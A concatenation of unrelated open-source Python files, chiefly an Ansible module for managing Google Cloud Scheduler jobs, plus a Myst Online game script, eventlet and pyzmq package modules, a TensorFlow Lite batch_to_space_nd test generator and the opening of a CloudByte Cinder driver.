module.fail_json(msg=msg, failed_conditions=failed_conditions)
result = {
'changed': False,
'stdout': responses,
'stdout_lines': list(to_lines(responses))
}
module.exit_json(**result)
if __name__ == '__main__':
main()
| haad/ansible | lib/ansible/modules/network/dellos10/dellos10_command.py | Python | gpl-3.0 | 7,132 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2017 Google
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# ----------------------------------------------------------------------------
#
# *** AUTO GENERATED CODE *** AUTO GENERATED CODE ***
#
# ----------------------------------------------------------------------------
#
# This file is automatically generated by Magic Modules and manual
# changes will be clobbered when the file is regenerated.
#
# Please read more about how to change this file at
# https://www.github.com/GoogleCloudPlatform/magic-modules
#
# ----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function
__metaclass__ = type
################################################################################
# Documentation
################################################################################
ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ["preview"], 'supported_by': 'community'}
DOCUMENTATION = '''
---
module: gcp_cloudscheduler_job
description:
- A scheduled job that can publish a pubsub message or a http request every X interval
of time, using crontab format string.
- To use Cloud Scheduler your project must contain an App Engine app that is located
in one of the supported regions. If your project does not have an App Engine app,
you must create one.
short_description: Creates a GCP Job
version_added: 2.9
author: Google Inc. (@googlecloudplatform)
requirements:
- python >= 2.6
- requests >= 2.18.4
- google-auth >= 1.3.0
options:
state:
description:
- Whether the given object should exist in GCP
choices:
- present
- absent
default: present
type: str
name:
description:
- The name of the job.
required: true
type: str
description:
description:
- A human-readable description for the job. This string must not contain more
than 500 characters.
required: false
type: str
schedule:
description:
- Describes the schedule on which the job will be executed.
required: false
type: str
time_zone:
description:
- Specifies the time zone to be used in interpreting schedule.
- The value of this field must be a time zone name from the tz database.
required: false
default: Etc/UTC
type: str
retry_config:
description:
- By default, if a job does not complete successfully, meaning that an acknowledgement
is not received from the handler, then it will be retried with exponential backoff
according to the settings .
required: false
type: dict
suboptions:
retry_count:
description:
- The number of attempts that the system will make to run a job using the
exponential backoff procedure described by maxDoublings.
- Values greater than 5 and negative values are not allowed.
required: false
type: int
max_retry_duration:
description:
- The time limit for retrying a failed job, measured from time when an execution
was first attempted. If specified with retryCount, the job will be retried
until both limits are reached.
- A duration in seconds with up to nine fractional digits, terminated by 's'.
required: false
type: str
min_backoff_duration:
description:
- The minimum amount of time to wait before retrying a job after it fails.
- A duration in seconds with up to nine fractional digits, terminated by 's'.
required: false
type: str
max_backoff_duration:
description:
- The maximum amount of time to wait before retrying a job after it fails.
- A duration in seconds with up to nine fractional digits, terminated by 's'.
required: false
type: str
max_doublings:
description:
- The time between retries will double maxDoublings times.
- A job's retry interval starts at minBackoffDuration, then doubles maxDoublings
        times, then increases linearly, and finally retries at intervals
of maxBackoffDuration up to retryCount times.
required: false
type: int
pubsub_target:
description:
    - Pub/Sub target. If the job provides a Pub/Sub target, the cron will publish a
      message to the provided topic.
required: false
type: dict
suboptions:
topic_name:
description:
- The name of the Cloud Pub/Sub topic to which messages will be published
when a job is delivered. The topic name must be in the same format as required
by PubSub's PublishRequest.name, for example projects/PROJECT_ID/topics/TOPIC_ID.
required: true
type: str
data:
description:
- The message payload for PubsubMessage.
- Pubsub message must contain either non-empty data, or at least one attribute.
required: false
type: str
attributes:
description:
- Attributes for PubsubMessage.
- Pubsub message must contain either non-empty data, or at least one attribute.
required: false
type: dict
app_engine_http_target:
description:
- App Engine HTTP target.
    - If the job provides an App Engine HTTP target, the cron will send a request to
      the service instance.
required: false
type: dict
suboptions:
http_method:
description:
- Which HTTP method to use for the request.
required: false
type: str
app_engine_routing:
description:
- App Engine Routing setting for the job.
required: false
type: dict
suboptions:
service:
description:
- App service.
- By default, the job is sent to the service which is the default service
when the job is attempted.
required: false
type: str
version:
description:
- App version.
- By default, the job is sent to the version which is the default version
when the job is attempted.
required: false
type: str
instance:
description:
- App instance.
- By default, the job is sent to an instance which is available when the
job is attempted.
required: false
type: str
relative_uri:
description:
- The relative URI.
required: true
type: str
body:
description:
- HTTP request body. A request body is allowed only if the HTTP method is
POST or PUT. It will result in invalid argument error to set a body on a
job with an incompatible HttpMethod.
required: false
type: str
headers:
description:
- HTTP request headers.
- This map contains the header field names and values. Headers can be set
when the job is created.
required: false
type: dict
http_target:
description:
- HTTP target.
    - If the job provides an http_target, the cron will send a request to the targeted
      url.
required: false
type: dict
suboptions:
uri:
description:
- The full URI path that the request will be sent to.
required: true
type: str
http_method:
description:
- Which HTTP method to use for the request.
required: false
type: str
body:
description:
- HTTP request body. A request body is allowed only if the HTTP method is
POST, PUT, or PATCH. It is an error to set body on a job with an incompatible
HttpMethod.
required: false
type: str
headers:
description:
- This map contains the header field names and values. Repeated headers are
not supported, but a header value can contain commas.
required: false
type: dict
oauth_token:
description:
- Contains information needed for generating an OAuth token.
- This type of authorization should be used when sending requests to a GCP
endpoint.
required: false
type: dict
suboptions:
service_account_email:
description:
- Service account email to be used for generating OAuth token.
- The service account must be within the same project as the job.
required: false
type: str
scope:
description:
- OAuth scope to be used for generating OAuth access token. If not specified,
"U(https://www.googleapis.com/auth/cloud-platform") will be used.
required: false
type: str
oidc_token:
description:
- Contains information needed for generating an OpenID Connect token.
- This type of authorization should be used when sending requests to third
party endpoints or Cloud Run.
required: false
type: dict
suboptions:
service_account_email:
description:
- Service account email to be used for generating OAuth token.
- The service account must be within the same project as the job.
required: false
type: str
audience:
description:
- Audience to be used when generating OIDC token. If not specified, the
URI specified in target will be used.
required: false
type: str
region:
description:
- Region where the scheduler job resides .
required: true
type: str
extends_documentation_fragment: gcp
notes:
- 'API Reference: U(https://cloud.google.com/scheduler/docs/reference/rest/)'
- 'Official Documentation: U(https://cloud.google.com/scheduler/)'
'''
EXAMPLES = '''
- name: create a job
gcp_cloudscheduler_job:
name: job
region: us-central1
schedule: "*/4 * * * *"
description: test app engine job
time_zone: Europe/London
app_engine_http_target:
http_method: POST
app_engine_routing:
service: web
version: prod
instance: my-instance-001
relative_uri: "/ping"
project: test_project
auth_kind: serviceaccount
service_account_file: "/tmp/auth.pem"
state: present
'''
RETURN = '''
name:
description:
- The name of the job.
returned: success
type: str
description:
description:
- A human-readable description for the job. This string must not contain more than
500 characters.
returned: success
type: str
schedule:
description:
- Describes the schedule on which the job will be executed.
returned: success
type: str
timeZone:
description:
- Specifies the time zone to be used in interpreting schedule.
- The value of this field must be a time zone name from the tz database.
returned: success
type: str
retryConfig:
description:
- By default, if a job does not complete successfully, meaning that an acknowledgement
is not received from the handler, then it will be retried with exponential backoff
according to the settings .
returned: success
type: complex
contains:
retryCount:
description:
- The number of attempts that the system will make to run a job using the exponential
backoff procedure described by maxDoublings.
- Values greater than 5 and negative values are not allowed.
returned: success
type: int
maxRetryDuration:
description:
- The time limit for retrying a failed job, measured from time when an execution
was first attempted. If specified with retryCount, the job will be retried
until both limits are reached.
- A duration in seconds with up to nine fractional digits, terminated by 's'.
returned: success
type: str
minBackoffDuration:
description:
- The minimum amount of time to wait before retrying a job after it fails.
- A duration in seconds with up to nine fractional digits, terminated by 's'.
returned: success
type: str
maxBackoffDuration:
description:
- The maximum amount of time to wait before retrying a job after it fails.
- A duration in seconds with up to nine fractional digits, terminated by 's'.
returned: success
type: str
maxDoublings:
description:
- The time between retries will double maxDoublings times.
- A job's retry interval starts at minBackoffDuration, then doubles maxDoublings
      times, then increases linearly, and finally retries at intervals of
maxBackoffDuration up to retryCount times.
returned: success
type: int
pubsubTarget:
description:
  - Pub/Sub target. If the job provides a Pub/Sub target, the cron will publish a message
    to the provided topic.
returned: success
type: complex
contains:
topicName:
description:
- The name of the Cloud Pub/Sub topic to which messages will be published when
a job is delivered. The topic name must be in the same format as required
by PubSub's PublishRequest.name, for example projects/PROJECT_ID/topics/TOPIC_ID.
returned: success
type: str
data:
description:
- The message payload for PubsubMessage.
- Pubsub message must contain either non-empty data, or at least one attribute.
returned: success
type: str
attributes:
description:
- Attributes for PubsubMessage.
- Pubsub message must contain either non-empty data, or at least one attribute.
returned: success
type: dict
appEngineHttpTarget:
description:
- App Engine HTTP target.
  - If the job provides an App Engine HTTP target, the cron will send a request to
    the service instance.
returned: success
type: complex
contains:
httpMethod:
description:
- Which HTTP method to use for the request.
returned: success
type: str
appEngineRouting:
description:
- App Engine Routing setting for the job.
returned: success
type: complex
contains:
service:
description:
- App service.
- By default, the job is sent to the service which is the default service
when the job is attempted.
returned: success
type: str
version:
description:
- App version.
- By default, the job is sent to the version which is the default version
when the job is attempted.
returned: success
type: str
instance:
description:
- App instance.
- By default, the job is sent to an instance which is available when the
job is attempted.
returned: success
type: str
relativeUri:
description:
- The relative URI.
returned: success
type: str
body:
description:
- HTTP request body. A request body is allowed only if the HTTP method is POST
or PUT. It will result in invalid argument error to set a body on a job with
an incompatible HttpMethod.
returned: success
type: str
headers:
description:
- HTTP request headers.
- This map contains the header field names and values. Headers can be set when
the job is created.
returned: success
type: dict
httpTarget:
description:
- HTTP target.
  - If the job provides an http_target, the cron will send a request to the targeted
    url.
returned: success
type: complex
contains:
uri:
description:
- The full URI path that the request will be sent to.
returned: success
type: str
httpMethod:
description:
- Which HTTP method to use for the request.
returned: success
type: str
body:
description:
- HTTP request body. A request body is allowed only if the HTTP method is POST,
PUT, or PATCH. It is an error to set body on a job with an incompatible HttpMethod.
returned: success
type: str
headers:
description:
- This map contains the header field names and values. Repeated headers are
not supported, but a header value can contain commas.
returned: success
type: dict
oauthToken:
description:
- Contains information needed for generating an OAuth token.
- This type of authorization should be used when sending requests to a GCP endpoint.
returned: success
type: complex
contains:
serviceAccountEmail:
description:
- Service account email to be used for generating OAuth token.
- The service account must be within the same project as the job.
returned: success
type: str
scope:
description:
- OAuth scope to be used for generating OAuth access token. If not specified,
"U(https://www.googleapis.com/auth/cloud-platform") will be used.
returned: success
type: str
oidcToken:
description:
- Contains information needed for generating an OpenID Connect token.
- This type of authorization should be used when sending requests to third party
endpoints or Cloud Run.
returned: success
type: complex
contains:
serviceAccountEmail:
description:
- Service account email to be used for generating OAuth token.
- The service account must be within the same project as the job.
returned: success
type: str
audience:
description:
- Audience to be used when generating OIDC token. If not specified, the
URI specified in target will be used.
returned: success
type: str
region:
description:
- Region where the scheduler job resides .
returned: success
type: str
'''
################################################################################
# Imports
################################################################################
from ansible.module_utils.gcp_utils import navigate_hash, GcpSession, GcpModule, GcpRequest, remove_nones_from_dict, replace_resource_dict
import json
################################################################################
# Main
################################################################################
def main():
"""Main function"""
module = GcpModule(
argument_spec=dict(
state=dict(default='present', choices=['present', 'absent'], type='str'),
name=dict(required=True, type='str'),
description=dict(type='str'),
schedule=dict(type='str'),
time_zone=dict(default='Etc/UTC', type='str'),
retry_config=dict(
type='dict',
options=dict(
retry_count=dict(type='int'),
max_retry_duration=dict(type='str'),
min_backoff_duration=dict(type='str'),
max_backoff_duration=dict(type='str'),
max_doublings=dict(type='int'),
),
),
pubsub_target=dict(type='dict', options=dict(topic_name=dict(required=True, type='str'), data=dict(type='str'), attributes=dict(type='dict'))),
app_engine_http_target=dict(
type='dict',
options=dict(
http_method=dict(type='str'),
app_engine_routing=dict(type='dict', options=dict(service=dict(type='str'), version=dict(type='str'), instance=dict(type='str'))),
relative_uri=dict(required=True, type='str'),
body=dict(type='str'),
headers=dict(type='dict'),
),
),
http_target=dict(
type='dict',
options=dict(
uri=dict(required=True, type='str'),
http_method=dict(type='str'),
body=dict(type='str'),
headers=dict(type='dict'),
oauth_token=dict(type='dict', options=dict(service_account_email=dict(type='str'), scope=dict(type='str'))),
oidc_token=dict(type='dict', options=dict(service_account_email=dict(type='str'), audience=dict(type='str'))),
),
),
region=dict(required=True, type='str'),
),
mutually_exclusive=[['app_engine_http_target', 'http_target', 'pubsub_target']],
)
if not module.params['scopes']:
module.params['scopes'] = ['https://www.googleapis.com/auth/cloud-platform']
state = module.params['state']
fetch = fetch_resource(module, self_link(module))
changed = False
if fetch:
if state == 'present':
if is_different(module, fetch):
update(module, self_link(module))
fetch = fetch_resource(module, self_link(module))
changed = True
else:
delete(module, self_link(module))
fetch = {}
changed = True
else:
if state == 'present':
fetch = create(module, collection(module))
changed = True
else:
fetch = {}
fetch.update({'changed': changed})
module.exit_json(**fetch)
def create(module, link):
auth = GcpSession(module, 'cloudscheduler')
return return_if_object(module, auth.post(link, resource_to_request(module)))
def update(module, link):
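    # A Cloud Scheduler job is updated here by deleting and re-creating it.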
delete(module, self_link(module))
create(module, collection(module))
def delete(module, link):
auth = GcpSession(module, 'cloudscheduler')
return return_if_object(module, auth.delete(link))
def resource_to_request(module):
request = {
u'name': module.params.get('name'),
u'description': module.params.get('description'),
u'schedule': module.params.get('schedule'),
u'timeZone': module.params.get('time_zone'),
u'retryConfig': JobRetryconfig(module.params.get('retry_config', {}), module).to_request(),
u'pubsubTarget': JobPubsubtarget(module.params.get('pubsub_target', {}), module).to_request(),
u'appEngineHttpTarget': JobAppenginehttptarget(module.params.get('app_engine_http_target', {}), module).to_request(),
u'httpTarget': JobHttptarget(module.params.get('http_target', {}), module).to_request(),
}
request = encode_request(request, module)
return_vals = {}
for k, v in request.items():
if v or v is False:
return_vals[k] = v
return return_vals
def fetch_resource(module, link, allow_not_found=True):
auth = GcpSession(module, 'cloudscheduler')
return return_if_object(module, auth.get(link), allow_not_found)
def self_link(module):
return "https://cloudscheduler.googleapis.com/v1/projects/{project}/locations/{region}/jobs/{name}".format(**module.params)
def collection(module):
return "https://cloudscheduler.googleapis.com/v1/projects/{project}/locations/{region}/jobs".format(**module.params)
def return_if_object(module, response, allow_not_found=False):
# If not found, return nothing.
if allow_not_found and response.status_code == 404:
return None
# If no content, return nothing.
if response.status_code == 204:
return None
try:
module.raise_for_status(response)
result = response.json()
except getattr(json.decoder, 'JSONDecodeError', ValueError):
module.fail_json(msg="Invalid JSON response with error: %s" % response.text)
result = decode_request(result, module)
if navigate_hash(result, ['error', 'errors']):
module.fail_json(msg=navigate_hash(result, ['error', 'errors']))
return result
def is_different(module, response):
request = resource_to_request(module)
response = response_to_hash(module, response)
request = decode_request(request, module)
# Remove all output-only from response.
response_vals = {}
for k, v in response.items():
if k in request:
response_vals[k] = v
request_vals = {}
for k, v in request.items():
if k in response:
request_vals[k] = v
return GcpRequest(request_vals) != GcpRequest(response_vals)
# Remove unnecessary properties from the response.
# This is for doing comparisons with Ansible's current parameters.
def response_to_hash(module, response):
return {
u'name': module.params.get('name'),
u'description': module.params.get('description'),
u'schedule': module.params.get('schedule'),
u'timeZone': module.params.get('time_zone'),
u'retryConfig': JobRetryconfig(module.params.get('retry_config', {}), module).to_request(),
u'pubsubTarget': JobPubsubtarget(module.params.get('pubsub_target', {}), module).to_request(),
u'appEngineHttpTarget': JobAppenginehttptarget(module.params.get('app_engine_http_target', {}), module).to_request(),
u'httpTarget': JobHttptarget(module.params.get('http_target', {}), module).to_request(),
}
def encode_request(request, module):
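    # Expand the short job name into the fully qualified resource name the API expects.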
request['name'] = "projects/%s/locations/%s/jobs/%s" % (module.params['project'], module.params['region'], module.params['name'])
return request
def decode_request(response, module):
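    # Collapse the fully qualified resource name back to the short job name so it
    # can be compared against the module parameters.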
if 'name' in response:
response['name'] = response['name'].split('/')[-1]
return response
class JobRetryconfig(object):
def __init__(self, request, module):
self.module = module
if request:
self.request = request
else:
self.request = {}
def to_request(self):
return remove_nones_from_dict(
{
u'retryCount': self.request.get('retry_count'),
u'maxRetryDuration': self.request.get('max_retry_duration'),
u'minBackoffDuration': self.request.get('min_backoff_duration'),
u'maxBackoffDuration': self.request.get('max_backoff_duration'),
u'maxDoublings': self.request.get('max_doublings'),
}
)
def from_response(self):
return remove_nones_from_dict(
{
u'retryCount': self.module.params.get('retry_count'),
u'maxRetryDuration': self.module.params.get('max_retry_duration'),
u'minBackoffDuration': self.module.params.get('min_backoff_duration'),
u'maxBackoffDuration': self.module.params.get('max_backoff_duration'),
u'maxDoublings': self.module.params.get('max_doublings'),
}
)
class JobPubsubtarget(object):
def __init__(self, request, module):
self.module = module
if request:
self.request = request
else:
self.request = {}
def to_request(self):
return remove_nones_from_dict(
{u'topicName': self.request.get('topic_name'), u'data': self.request.get('data'), u'attributes': self.request.get('attributes')}
)
def from_response(self):
return remove_nones_from_dict(
{u'topicName': self.module.params.get('topic_name'), u'data': self.module.params.get('data'), u'attributes': self.module.params.get('attributes')}
)
class JobAppenginehttptarget(object):
def __init__(self, request, module):
self.module = module
if request:
self.request = request
else:
self.request = {}
def to_request(self):
return remove_nones_from_dict(
{
u'httpMethod': self.request.get('http_method'),
u'appEngineRouting': JobAppenginerouting(self.request.get('app_engine_routing', {}), self.module).to_request(),
u'relativeUri': self.request.get('relative_uri'),
u'body': self.request.get('body'),
u'headers': self.request.get('headers'),
}
)
def from_response(self):
return remove_nones_from_dict(
{
u'httpMethod': self.module.params.get('http_method'),
u'appEngineRouting': JobAppenginerouting(self.module.params.get('app_engine_routing', {}), self.module).to_request(),
u'relativeUri': self.request.get(u'relativeUri'),
u'body': self.module.params.get('body'),
u'headers': self.module.params.get('headers'),
}
)
class JobAppenginerouting(object):
def __init__(self, request, module):
self.module = module
if request:
self.request = request
else:
self.request = {}
def to_request(self):
return remove_nones_from_dict(
{u'service': self.request.get('service'), u'version': self.request.get('version'), u'instance': self.request.get('instance')}
)
def from_response(self):
return remove_nones_from_dict(
{u'service': self.module.params.get('service'), u'version': self.module.params.get('version'), u'instance': self.module.params.get('instance')}
)
class JobHttptarget(object):
def __init__(self, request, module):
self.module = module
if request:
self.request = request
else:
self.request = {}
def to_request(self):
return remove_nones_from_dict(
{
u'uri': self.request.get('uri'),
u'httpMethod': self.request.get('http_method'),
u'body': self.request.get('body'),
u'headers': self.request.get('headers'),
u'oauthToken': JobOauthtoken(self.request.get('oauth_token', {}), self.module).to_request(),
u'oidcToken': JobOidctoken(self.request.get('oidc_token', {}), self.module).to_request(),
}
)
def from_response(self):
return remove_nones_from_dict(
{
u'uri': self.request.get(u'uri'),
u'httpMethod': self.request.get(u'httpMethod'),
u'body': self.request.get(u'body'),
u'headers': self.request.get(u'headers'),
u'oauthToken': JobOauthtoken(self.module.params.get('oauth_token', {}), self.module).to_request(),
u'oidcToken': JobOidctoken(self.module.params.get('oidc_token', {}), self.module).to_request(),
}
)
class JobOauthtoken(object):
def __init__(self, request, module):
self.module = module
if request:
self.request = request
else:
self.request = {}
def to_request(self):
return remove_nones_from_dict({u'serviceAccountEmail': self.request.get('service_account_email'), u'scope': self.request.get('scope')})
def from_response(self):
return remove_nones_from_dict({u'serviceAccountEmail': self.request.get(u'serviceAccountEmail'), u'scope': self.request.get(u'scope')})
class JobOidctoken(object):
def __init__(self, request, module):
self.module = module
if request:
self.request = request
else:
self.request = {}
def to_request(self):
return remove_nones_from_dict({u'serviceAccountEmail': self.request.get('service_account_email'), u'audience': self.request.get('audience')})
def from_response(self):
return remove_nones_from_dict({u'serviceAccountEmail': self.request.get(u'serviceAccountEmail'), u'audience': self.request.get(u'audience')})
if __name__ == '__main__':
main()
| resmo/ansible | lib/ansible/modules/cloud/google/gcp_cloudscheduler_job.py | Python | gpl-3.0 | 31,832 |
# -*- coding: utf-8 -*-
""" *==LICENSE==*
CyanWorlds.com Engine - MMOG client, server and tools
Copyright (C) 2011 Cyan Worlds, Inc.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
Additional permissions under GNU GPL version 3 section 7
If you modify this Program, or any covered work, by linking or
combining it with any of RAD Game Tools Bink SDK, Autodesk 3ds Max SDK,
NVIDIA PhysX SDK, Microsoft DirectX SDK, OpenSSL library, Independent
JPEG Group JPEG library, Microsoft Windows Media SDK, or Apple QuickTime SDK
(or a modified version of those libraries),
containing parts covered by the terms of the Bink SDK EULA, 3ds Max EULA,
PhysX SDK EULA, DirectX SDK EULA, OpenSSL and SSLeay licenses, IJG
JPEG Library README, Windows Media SDK EULA, or QuickTime SDK EULA, the
licensors of this Program grant you additional
permission to convey the resulting work. Corresponding Source for a
non-source form of such a combination shall include the source code for
the parts of OpenSSL and IJG JPEG Library used as well as that of the covered
work.
You can contact Cyan Worlds, Inc. by email [email protected]
or by snail mail at:
Cyan Worlds, Inc.
14617 N Newport Hwy
Mead, WA 99021
*==LICENSE==* """
"""
Module: ahnyTrees
Age: Ahnonay
Date: April, 2007
Author: Derek Odell
Ahnonay Quab control
"""
from Plasma import *
from PlasmaTypes import *
# define the attributes that will be entered in max
rgnTrees = ptAttribActivator(1, "act: Tree Detector")
respTreeAnims = ptAttribResponderList(2, "resp: Tree Anims", byObject=1)
objTrees = ptAttribSceneobjectList(3, "obj: Tree Meshes")
SDLTrees = ptAttribString(4, "str: SDL Trees (optional)")
# globals
respTreeAnimsList = []
objTreeList = []
#====================================
class ahnyTrees(ptModifier):
###########################
def __init__(self):
ptModifier.__init__(self)
self.id = 5948
version = 1
self.version = version
print "__init__ahnyTrees v%d " % (version)
###########################
def OnFirstUpdate(self):
global respTreeAnimsList
global objTreeList
try:
ageSDL = PtGetAgeSDL()
ageSDL[SDLTrees.value][0]
except:
print "ahnyTrees.OnServerInitComplete(): ERROR --- Cannot find the Ahnonay Age SDL"
ageSDL[SDLTrees.value] = (1,1,1,1,1,1,1,1,1,1,1,1,1,1,1)
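            # (presumably) one visibility flag per tree mesh: 1 = standing, 0 = knocked down,
            # matching the knock-down logic in OnNotify below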
ageSDL.setFlags(SDLTrees.value,1,1)
ageSDL.sendToClients(SDLTrees.value)
ageSDL.setNotify(self.key,SDLTrees.value,0.0)
for responder in respTreeAnims.value:
thisResp = responder.getName()
respTreeAnimsList.append(thisResp)
for object in objTrees.value:
thisObj = object.getName()
objTreeList.append(thisObj)
ageSDL = PtGetAgeSDL()
idx = 0
for visible in ageSDL[SDLTrees.value]:
if not visible:
respTreeAnims.run(self.key, objectName=respTreeAnimsList[idx], fastforward=1)
idx += 1
###########################
def OnNotify(self,state,id,events):
global respTreeAnimsList
global objTreeList
print "ahnyTrees.OnNotify: state=%s id=%d events=" % (state, id), events
if id == rgnTrees.id:
for event in events:
if event[0] == kCollisionEvent and self.sceneobject.isLocallyOwned() :
region = event[3]
regName = region.getName()
for object in objTreeList:
if object == regName:
ageSDL = PtGetAgeSDL()
treeSDL = list(ageSDL[SDLTrees.value])
index = objTreeList.index(object)
if treeSDL[index]:
respTreeAnims.run(self.key, objectName=respTreeAnimsList[index], netForce = 1)
treeSDL[index] = 0
ageSDL[SDLTrees.value] = tuple(treeSDL)
print "ahnyTrees.OnNotify: Tree knocked down"
| TOC-Shard/moul-scripts | Python/ahnyTrees.py | Python | gpl-3.0 | 4,774 |
from eventlet import patcher
from eventlet.green import socket
from eventlet.green import time
from eventlet.green import httplib
from eventlet.green import ftplib
from eventlet.support import six
if six.PY2:
to_patch = [('socket', socket), ('httplib', httplib),
('time', time), ('ftplib', ftplib)]
try:
from eventlet.green import ssl
to_patch.append(('ssl', ssl))
except ImportError:
pass
patcher.inject('urllib', globals(), *to_patch)
try:
URLopener
except NameError:
patcher.inject('urllib.request', globals(), *to_patch)
# patch a bunch of things that have imports inside the
# function body; this is lame and hacky but I don't feel
# too bad because urllib is a hacky pile of junk that no
# one should be using anyhow
    URLopener.open_http = patcher.patch_function(URLopener.open_http, ('httplib', httplib))
    if hasattr(URLopener, 'open_https'):
        URLopener.open_https = patcher.patch_function(URLopener.open_https, ('httplib', httplib))
    URLopener.open_ftp = patcher.patch_function(URLopener.open_ftp, ('ftplib', ftplib))
    ftpwrapper.init = patcher.patch_function(ftpwrapper.init, ('ftplib', ftplib))
    ftpwrapper.retrfile = patcher.patch_function(ftpwrapper.retrfile, ('ftplib', ftplib))
    del patcher
    # Run test program when run as a script
    if __name__ == '__main__':
        main()
| pbaesse/Sissens | lib/python2.7/site-packages/eventlet/green/urllib/__init__.py | Python | gpl-3.0 | 1,423 |
"""pure-Python sugar wrappers for core 0MQ objects."""
#-----------------------------------------------------------------------------
# Copyright (C) 2013 Brian Granger, Min Ragan-Kelley
#
# This file is part of pyzmq
#
# Distributed under the terms of the New BSD License. The full license is in
# the file COPYING.BSD, distributed as part of this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
from zmq.sugar import (
constants, context, frame, poll, socket, tracker, version
)
from zmq import error
__all__ = ['constants']
for submod in (
constants, context, error, frame, poll, socket, tracker, version
):
__all__.extend(submod.__all__)
from zmq.error import *
from zmq.sugar.context import *
from zmq.sugar.tracker import *
from zmq.sugar.socket import *
from zmq.sugar.constants import *
from zmq.sugar.frame import *
from zmq.sugar.poll import *
# from zmq.sugar.stopwatch import *
# from zmq.sugar._device import *
from zmq.sugar.version import *
| IsCoolEntertainment/debpkg_python-pyzmq | zmq/sugar/__init__.py | Python | lgpl-3.0 | 1,187 |
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Test configs for batch_to_space_nd."""
import numpy as np
import tensorflow.compat.v1 as tf
from tensorflow.lite.testing.zip_test_utils import create_tensor_data
from tensorflow.lite.testing.zip_test_utils import make_zip_of_tests
from tensorflow.lite.testing.zip_test_utils import register_make_test_function
@register_make_test_function()
def make_batch_to_space_nd_tests(options):
"""Make a set of tests to do batch_to_space_nd."""
test_parameters = [
{
"dtype": [tf.float32, tf.int64, tf.int32],
"input_shape": [[12, 3, 3, 1]],
"block_shape": [[1, 4], [2, 2], [3, 4]],
"crops": [[[0, 0], [0, 0]], [[1, 1], [1, 1]]],
"constant_block_shape": [True, False],
"constant_crops": [True, False],
"dynamic_range_quantize": [False],
},
# Single batch (no-op)
{
"dtype": [tf.float32],
"input_shape": [[1, 3, 3, 1]],
"block_shape": [[1, 1]],
"crops": [[[0, 0], [0, 0]], [[1, 1], [1, 1]]],
"constant_block_shape": [True],
"constant_crops": [True],
"dynamic_range_quantize": [True, False],
},
# 3D use case.
{
"dtype": [tf.float32],
"input_shape": [[1, 3, 3]],
"block_shape": [[1]],
"crops": [[[0, 0]], [[1, 1]]],
"constant_block_shape": [True],
"constant_crops": [True],
"dynamic_range_quantize": [True, False],
},
]
if options.run_with_flex:
# Non-4D use case: 1 batch dimension, 3 spatial dimensions, 2 others.
test_parameters = test_parameters + [{
"dtype": [tf.float32],
"input_shape": [[8, 2, 2, 2, 1, 1]],
"block_shape": [[2, 2, 2]],
"crops": [[[0, 0], [0, 0], [0, 0]]],
"constant_block_shape": [True, False],
"constant_crops": [True, False],
"dynamic_range_quantize": [False],
}]
def build_graph(parameters):
"""Build a batch_to_space graph given `parameters`."""
input_tensor = tf.compat.v1.placeholder(
dtype=parameters["dtype"],
name="input",
shape=parameters["input_shape"])
input_tensors = [input_tensor]
# Get block_shape either as a const or as a placeholder (tensor).
if parameters["constant_block_shape"]:
block_shape = parameters["block_shape"]
else:
shape = [len(parameters["block_shape"])]
block_shape = tf.compat.v1.placeholder(
dtype=tf.int32, name="shape", shape=shape)
input_tensors.append(block_shape)
# Get crops either as a const or as a placeholder (tensor).
if parameters["constant_crops"]:
crops = parameters["crops"]
else:
shape = [len(parameters["crops"]), 2]
crops = tf.compat.v1.placeholder(
dtype=tf.int32, name="crops", shape=shape)
input_tensors.append(crops)
out = tf.batch_to_space_nd(input_tensor, block_shape, crops)
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
values = [
create_tensor_data(parameters["dtype"], parameters["input_shape"])
]
if not parameters["constant_block_shape"]:
values.append(np.array(parameters["block_shape"]))
if not parameters["constant_crops"]:
values.append(np.array(parameters["crops"]))
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
| tensorflow/tensorflow | tensorflow/lite/testing/op_tests/batch_to_space_nd.py | Python | apache-2.0 | 4,144 |
# Copyright 2015 CloudByte Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import uuid
from oslo_log import log as logging
from oslo_service import loopingcall
from oslo_utils import units
import six
from six.moves import http_client
from six.moves import urllib
from cinder import exception
from cinder.i18n import _, _LE, _LI
from cinder.volume.drivers.cloudbyte import options
from cinder.volume.drivers.san import san
LOG = logging.getLogger(__name__)
class CloudByteISCSIDriver(san.SanISCSIDriver):
"""CloudByte ISCSI Driver.
Version history:
1.0.0 - Initial driver
1.1.0 - Add chap support and minor bug fixes
1.1.1 - Add wait logic for delete volumes
"""
VERSION = '1.1.1'
volume_stats = {}
def __init__(self, *args, **kwargs):
super(CloudByteISCSIDriver, self).__init__(*args, **kwargs)
self.configuration.append_config_values(
options.cloudbyte_add_qosgroup_opts)
self.configuration.append_config_values(
options.cloudbyte_create_volume_opts)
self.configuration.append_config_values(
options.cloudbyte_connection_opts)
self.cb_use_chap = self.configuration.use_chap_auth
